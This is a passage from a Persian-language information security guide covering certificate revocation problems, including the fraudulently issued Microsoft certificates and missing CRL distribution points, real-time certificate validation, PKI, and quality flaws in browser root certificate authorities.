‫ﺩﺭ ﻣﻮﺭﺩ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺟﻌﻠﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻛﻪ ﭘﻴﺸﺘﺮ ﺍﺷـﺎﺭﻩ ﺷـﺪ‪ ،‬ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﻧﺎﺩﺭﺳـﺖ ﺑﺎﻃـﻞ ﺷـﺪﻧﺪ ﻭ ﺩﺭ ‪ CRL‬ﻣﺮﺑـﻮﻁ ﺑـﻪ‬
‫‪ VeriSign‬ﺁﻣﺪﻧﺪ‪ ،‬ﺍﻣﺎ ﻣﺘﺄﺳﻔﺎﻧﻪ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ‪ VeriSign‬ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﺑﻮﺩ ﺣﺎﻭﻱ ‪CDP‬ﻫـﺎﻱ ﻣﻌﺘﺒـﺮ ﻧﺒـﻮﺩ‪) .‬ﻃﺒـﻖ ﺍﻋـﻼﻡ ‪،VeriSign‬‬
‫ﺑﺪﻟﻴﻞ ﻳﻚ ﺍﺷﻜﺎﻝ ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ‪ Authenticode‬ﻛﻪ ﻫﻤﺮﺍﻩ ‪ Internet Explorer 3.02‬ﺗﻮﺯﻳﻊﺷﺪﻩ‪CDP ،‬ﻫﺎ ﺩﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ ‪ Authenticode‬ﻭﺟﻮﺩ ﻧﺪﺍﺭﻧﺪ‪(.‬‬
‫ﺑﺪﻭﻥ ﻭﺟﻮﺩ ‪ ،CDP‬ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲ ﺟﻌﻠﻲ ﺻﺎﺩﺭ ﺷﺪﻩ ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ‪ ،‬ﻧﻤﻲﺩﺍﻧﺴﺖ ﻛـﻪ ‪ CRL‬ﻣﺮﺑﻮﻃـﻪ ﻛـﻪ‬
‫‪١٤٥‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺑﺎﻃﻠﻪ ﺩﺭ ﺁﻥ ﻓﻬﺮﺳﺖ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﺭﺍ ﺍﺯ ﻛﺠﺎ ﺑﺎﻳﺪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﺮﺩ‪.‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺑﻼﺩﺭﻧﮓ ﮔﻮﺍﻫﻲﻫﺎ‬
‫ﻳﻚ ﺭﺍﻩ ﺟﺎﻳﮕﺰﻳﻦ ﺑﺮﺍﻱ ‪CRL‬ﻫﺎ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ ﺍﺳﺖ‪ .‬ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﻻﺯﻡ ﺑﺎﺷﺪ ﻳﻚ ﮔﻮﺍﻫﻲ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒـﺎﺭ‬
‫ﺷﻮﺩ ﺑﺼﻮﺭﺕ ‪ online‬ﺑﺎ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﺸﻮﺭﺕ ﻣﻲﻛﻨﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺑﻼﺩﺭﻧﮓ ﻣﺸﻜﻞ ‪ CRL‬ﺭﺍ ﺑﺨﻮﺑﻲ ﺣـﻞ ﻣـﻲﻛﻨﻨـﺪ‪،‬‬
‫ﻫﺮﭼﻨﺪ ﮐﻪ ﺑﻪ ﻳﻚ ﺷﺒﻜﺔ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﻭ ﻣﻌﺘﺒﺮ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪.‬‬
‫‪142 http://www.microsoft.com/technet/security/bulletin/MS01-017.asp‬‬
‫‪143 Certificate Revocation Lists‬‬
‫‪144 CRL Distribution Point‬‬
‫‪ ۱۴۵‬ﺩﺭ ﭘﺎﻳﺎﻥ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻣﺠﺒﻮﺭ ﺷﺪ ﻳﻚ ﻭﺻﻠﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺻﺎﺩﺭ ﻛﻨﺪ ﺗﺎ ﻣﺸﻜﻞ ﺣﻞ ﺷﻮﺩ‪ .‬ﺍﺻـﻼﺡ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ ﺣـﺎﻭﻱ ﻳـﻚ ‪ CDP‬ﺍﺿـﺎﻓﻪ ﺑـﻮﺩ ﻛـﻪ ‪Internet‬‬
‫‪ Explorer‬ﺭﺍ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻳﻚ ‪ CRL‬ﻣﺤﻠﻲ ﻭﺍﺩﺍﺭ ﻣﻲﻛﺮﺩ ﺗﺎ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ‪ ،‬ﻭ ﻧﻴﺰ ﻳﻚ ﻓﻬﺮﺳﺖ ‪ CRL‬ﻛﻪ ﺩﻭ ﮔﻮﺍﻫﻲ ﺍﺷﺘﺒﺎﻩ ﺻﺎﺩﺭ ﺷﺪﻩ‬
‫ﺗﻮﺳﻂ ‪ VeriSign‬ﺩﺭ ﺁﻥ ﺑﻮﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣٢٥‬‬
‫ﻲ ﺍﻋﺘﺒﺎ ﹺﺭ ﮔﻮﺍﻫﻲ‪ ،‬ﻣﺸﻜﻞ "ﻣﻘﻴﺎﺱ" ﺍﺳﺖ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﮔﻮﺍﻫﻲﻫﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ‬
‫ﻣﺸﻜﻞ ﺍﻭﻝ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻼﺩﺭﻧﮓ ﺍﺭﺯﻳﺎﺑ ﹺ‬
‫ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺳﺮﻳﻌﺘﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﺷﻮﻧﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺟﺎﻣﻌﺔ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻛـﺎﺭﺑﺮﺍﻥ‪ ،‬ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ‬
‫ﺩﻫﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻼﺩﺭﻧﮓ ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺕ ﺧﺮﺍﺑﻲ ﺳﺮﻭﻳﺲ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﺷﺮﻛﺖ ﺗﺠﺎﺭﻱ ﺍﻣﻜﺎﻥ ﺍﺗﺼﺎﻝ‬
‫ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﺭﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺑﺎ ﻳﻚ ﮔﻮﺍﻫﻲ ﺑﺎﻳﺪ ﭼﮕﻮﻧﻪ ﺑﺮﺧﻮﺭﺩ ﻛﻨﺪ؟ ﺑﻪ ﺁﻥ ﺍﻋﺘﻤﺎﺩ ﻛﻨﺪ ﻳﺎ ﺍﻋﺘﺒﺎﺭﻱ ﺑـﺮﺍﻱ ﺁﻥ ﻗﺎﺋـﻞ ﻧـﺸﻮﺩ؟‬
‫ﺍﮔﺮ ﭘﻴﺶﻓﺮﺽ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩﻥ ﺑﺎﺷﺪ‪ ،‬ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻓﺮﺳﺘﺎﺩﻥ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻣﺠﺎﺯﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﻣﻮﺟﺐ ﺍﺯ ﻛﺎﺭ‬
‫ﺍﻓﺘﺎﺩﻥ ﺁﻥ ﺩﺭ ﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﮔﻮﺍﻫﻲ ﻧﺎﻣﻌﺘﺒﺮ ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﭘﻴﺶﻓﺮﺽ ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺑﺎﻋﺚ ﺷﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﺎﺷﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﻠﻴﺔ ﺗﺮﺍﻛﻨﺸﻬﺎ ﺭﺩ ﺷﻮﻧﺪ‪ ،‬ﻭ ﺍﻋﺘﺒـﺎﺭ ﺷـﺮﻛﺖ‬
‫ﺑﺴﺮﻋﺖ ﺧﺪﺷﻪﺩﺍﺭ ﮔﺮﺩﺩ‪.‬‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ )‪ (PKI‬ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﺳﻴﺴﺘﻢ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‪ ،‬ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ‪ ،‬ﺍﺑﺰﺍﺭﻫـﺎ‪ ،‬ﺳﻴـﺴﺘﻤﻬﺎ‪ ،‬ﻭ ﻧﻴـﺰ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻦ ﻓﻨﺎﻭﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﻳﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻃﺮﻓﺪﺍﺭﺍﻥ ﺍﻭﻟﻴﻪ ﺑﻪ ‪ ،PKI‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻤﺮﻛﺰ ﺑﻮﺩ ﻛﻪ ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻭﻟﺘﻬﺎ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻲﺷﺪ ﺗﺎ ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ‬
‫ﻫﻢ ﻣﺜﻞ ﺷﻨﺎﺳﻨﺎﻣﻪ ﻭ ﮔﺬﺭﻧﺎﻣﻪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﺩﻭﻟﺘﻬﺎ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﺩﻳﺪﮔﺎﻩ ﻗﺎﺑﻞ ﺑﺮﺭﺳﻲ ﺑﻮﺩ‪ ،‬ﺍﻣﺎ ﻫﺮﭼﻪ ﺑﻮﺩ ﺗﺎ ﻛﻨﻮﻥ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻧـﺸﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﺷﺮﻛﺘﻬﺎﻳﻲ ﻣﺜﻞ ‪ VeriSign‬ﻣﻴﻠﻴﻮﻧﻬﺎ ﮔﻮﺍﻫﻲ ﺑﺮﺍﻱ ﻣﻌﻴﻦ ﻛﺮﺩﻥ ﻫﻮﻳﺖ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺻﺎﺩﺭ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﻛﻠﻴﺪﻫﺎﻱ ﺍﻣﻀﺎﻱ ﻋﻼﻳﻢ ﺍﻳـﻦ‬
‫ﮔﻮﺍﻫﻲﻫﺎ ﺩﺭ ﻣﻘﻴﺎﺱ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺗﻮﺯﻳﻊ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﻳـﻦ ﺳﻠـﺴﻪ ﻣﺮﺍﺗـﺐ ﺍﻋﺘﻤـﺎﺩ ‪ -‬ﻣﺜـﻞ ﺳﻠـﺴﻠﻪ ﻣﺮﺍﺗﺒـﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ‪ -‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﻮﺳﻂ ﺑﻴﺶ ﺍﺯ ﺻﺪ ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ؛ ﺍﻣـﺎ‬
‫ﺑﻮﺳﻴﻠﺔ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﺧﺼﻮﺻﻲ‪ ،‬ﻭ ﻧﻪ ﺑﻮﺳﻴﻠﻪ ﺩﻭﻟﺖ‪ .‬ﻛﻠﻤﻪ "ﻋﻤﻮﻣﻲ" ﺩﺭ ‪ PKI‬ﻧﻴﺰ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ ﺑﻪ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ‬
‫ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ‪ ،‬ﻭ ﻧﻪ ﺑﻪ ﻋﻤﻮﻡ ﻣﺮﺩﻡ ﺑﺼﻮﺭﺕ ﻛﻠﻲ‪.‬‬
‫ﻣﺸﻜﻼﺕ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﺮﻭﺯﻱ‬
‫ﻫﺮﭼﻨﺪ ﺑﺎﻋﺚ ﺗﺄﺳﻒ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﺑﻪ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﺻﻠﻲ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﻛـﻪ ﺩﺭ ‪ Internet Explorer‬ﻭ ‪Netscape Navigator‬‬
‫ﻧﮕﺎﻩ ﺩﻗﻴﻘﻲ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ ﺩﺭ ﺧﻮﺍﻫﻴﺪ ﻳﺎﻓﺖ ﻧﺎﺳﺎﺯﮔﺎﺭﻳﻬﺎ ﻭ ﻣﺸﻜﻼﺕ ﻛﻨﺘﺮﻝ ﻛﻴﻔﻴﺖ ﺑﺰﺭﮔﻲ ﺩﺭ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﺮﻭﺯﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﻛﻮﺗﺎﻩ ﺑﻮﺩﻥ ﺩﻭﺭﻩ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺎﺳﺖﻫﺎﻱ ﮐﺎﺭﺑﺮﺩ ﮔﻮﺍﻫﻲ‬
‫ﻼ ﮔـﻮﺍﻫﻲ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺯ ‪CPS‬ﻫﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺩﻳﮕﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻧﻤﻲﺑﺎﺷﻨﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﺧﻮﺩ ﺍﻣﻀﺎﻱ ‪ Autoridad Certificadora del Colegio Nacional de Correduria Publica Mexicana, A.C.‬ﻛـﻪ‬
‫ﺑﻪ ﻫﻤﺮﺍﻩ ﺑﺮﻧﺎﻣﺔ ‪ Internet Explorer 5.0‬ﺗﻮﺯﻳﻊ ﺷﺪﻩ‪ ،‬ﺍﺯ ﮊﻭﺋﻦ ‪ ۱۹۹۹‬ﺗﺎ ﮊﻭﺋﻦ ‪ ۲۰۰۹‬ﻣﻌﺘﺒﺮ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﮔـﻮﺍﻫﻲ ﺍﺩﻋـﺎ ﻣـﻲﻛﻨـﺪ ﻛـﻪ‬
‫‪ CPS‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﺩﺭ ﺁﺩﺭﺱ ‪ http://www.correduriapublica.org.mx/RCD/dpc‬ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺍﻳـﻦ‬
‫‪ URL‬ﺣﺪﺍﻗﻞ ﺩﺭ ﺁﻭﺭﻳﻞ ‪ ۲۰۰۱‬ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻧﺒﻮﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺑﺮﺍﻱ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﻛﻪ ﻫﻤﺔ ‪URL‬ﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﮐﻪ ﺻﺎﺩﺭ ﮐﺮﺩﻩ ﺁﻣﺪﻩ ﺭﺍ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ CPS ،‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﻋﻮﺽ ﻛﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻫﺮ ‪ CPS‬ﺑﺎﻳﺪ ﺍﺯ ﻳـﻚ ‪ URL‬ﻳﻜﺘـﺎ ﺑﺪﺳـﺖ ﺁﻳـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻲ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻛﻪ ﺑﻪ ﺁﻥ ‪ CPS‬ﺑﺎﺯﻣﻲﮔﺮﺩﺩ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ ﺑﺎﺷـﻨﺪ‪ ،‬ﭼـﻮﻥ ﻣﻌﻨـﺎﻱ ﺣﻘـﻮﻗﻲ ﻭ‬
‫ﻟﻴﻨﻜﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤﺎﻡ ﻣﺪﺕ ﺍﻋﺘﺒﺎﺭ ﻫﺮ ﮔﻮﺍﻫ ﹺ‬
‫ﻗﺎﻧﻮﻧﻲ ﮔﻮﺍﻫﻲ ﺑﺪﻭﻥ ﺧﻮﺍﻧﺪﻥ ‪ CPS‬ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ‪ ،‬ﭼﻮﻥ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻌﻨﺎﻱ ﻳﻚ ﺍﻣـﻀﺎ ﭼﻨـﺪ‬
‫ﺳﺎﻝ ﺑﻌﺪ ﺍﺯ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﺁﻥ ﻣﻮﺭﺩ ﺳﺆﺍﻝ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﻗﺎﻋﺪﺗﹰﺎ ‪URL‬ﻫﺎ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻳﻚ ﺑﺎﺯﺓ ﺣﺪﺍﻗﻞ ‪ ۲۰‬ﺳﺎﻟﻪ ﻓﻌﺎﻝ ﺑﻤﺎﻧﻨﺪ‪.‬‬
‫‪٣٢٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻧﺎﭘﺎﻳﺪﺍﺭﻱﻫﺎ ﺩﺭ ﻓﻴﻠﺪﻫﺎﻱ ﮔﻮﺍﻫﻲ‬
‫ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ‪ Netscape Navigator‬ﻭ ‪ Internet Explorer‬ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﻌﻨﻮﺍﻥ ﭘﺎﻳﻪﺍﻱ ﺑﺮﺍﻱ ﺯﻳﺮﺳـﺎﺧﺖ‬
‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻬﺎﻥ ﻭ ﻋﻘﺪ ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ .‬ﺁﻧﭽﻪ ﺍﻳﻦ ﻫﺪﻑ ﺭﺍ ﭘﻴﭽﻴﺪﻩ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﻭﺍﻗﻌﻴﺖ ﺍﺳﺖ ﻛـﻪ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﮔﻮﺍﻫﻲ ﺑﺴﻴﺎﺭ ﻣﺘﻨﻮﻉ ﺍﺳﺖ‪ .‬ﺑﻪ ﺑﻴﺎﻥ ﺩﻗﻴﻘﺘﺮ‪ ،‬ﻓﻴﻠﺪ "ﻣﻮﺿﻮﻉ"‪ ،‬ﻛﻪ ﺑﺎ ﺍﺳـﻢ ﻣﻤﻴـﺰﻩ‪ ١٤٦‬ﺧـﻮﺩ ﻣﻌـﺮﻑ‬
‫ﻼ‬
‫ﺻﺎﺩﺭﻛﻨﻨﺪﻩ ﺍﺳﺖ ﻫﻴﭻ ﻗﺎﻟﺐ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﻧﺪﺍﺭﺩ‪ ،‬ﻭ ﮔﻮﺍﻫﻲ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﺘﻔﺎﻭﺕ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺷـﺎﻣﻞ ﺻـﻔﺎﺕ ﻣﻤﻴـﺰﺓ ﻛـﺎﻣ ﹰ‬
‫ﻣﺘﻔﺎﻭﺗﻲ ﺑﺎﺷﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﮔﻮﺍﻫﻲ ﺑﺨﻮﺍﻫﺪ ﺩﺭ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱﺷﺪﻩ ﺗﻮﺳﻂ ﻧﺮﻡﺍﻓﺰﺍﺭ ﭘﺮﺩﺍﺯﺵ ﺷﻮﺩ‪ ،‬ﺍﻟﺰﺍﻡ ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺳـﻢ ﻣﻤﻴـﺰﻩ ﻭ‬
‫ﻓﻴﻠﺪﻫﺎﻱ ﺩﻳﮕﺮ ﺣﻴﺎﺗﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﺍﻟﺰﺍﻡ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﮔﻮﺍﻫﻲﻫﺎ ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﻪ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﻫﻤـﺔ ﺍﻧـﻮﺍﻉ ﻭ‬
‫ﻗﺎﻟﺒﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻭ ﻗﺎﺑﻞ ﺗﺼﻮﺭ ﻧﺎﻣﻬﺎﻱ ﻣﺸﺮﻭﻉ ﺑﺼﻮﺭﺕ ﺑﺼﺮﻱ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﻌﺘﺒﺮ ﺭﺍ ﺍﺯ‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﻧﺎﻣﻌﺘﺒﺮ ﺗﺸﺨﻴﺺ ﺩﺍﺩ‪.‬‬
‫ﺗﺎﺭﻳﺦﻫﺎﻱ ﺍﻧﻘﻀﺎﻱ ﻏﻴﺮ ﻭﺍﻗﻊﮔﺮﺍﻳﺎﻧﻪ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﻪ ﻣﺮﻭﺭﮔﺮ ‪ Netscape Navigator‬ﺑﺎ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺗﻮﺯﻳﻊ ﺷﺪ ﻛﻪ ﺗﺎﺭﻳﺦ ﺍﻧﻘﻀﺎﻳﺸﺎﻥ ﺑﻴﻦ ‪ ۲۵‬ﻭ ‪ ۳۱‬ﺩﺳﺎﻣﺒﺮ ‪ ۱۹۹۹‬ﺑﻮﺩ‪.‬‬
‫ﺍﻳﻦ ﻣﺤﺼﻮﻻﺕ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﺁﻧﭽﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻓﺖ ﻫﻤﭽﻨﺎﻥ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻨﺪ‪ .‬ﺩﺭ ﭘﺎﻳـﺎﻥ ﺳـﺎﻝ ‪ ۱۹۹۹‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ‬
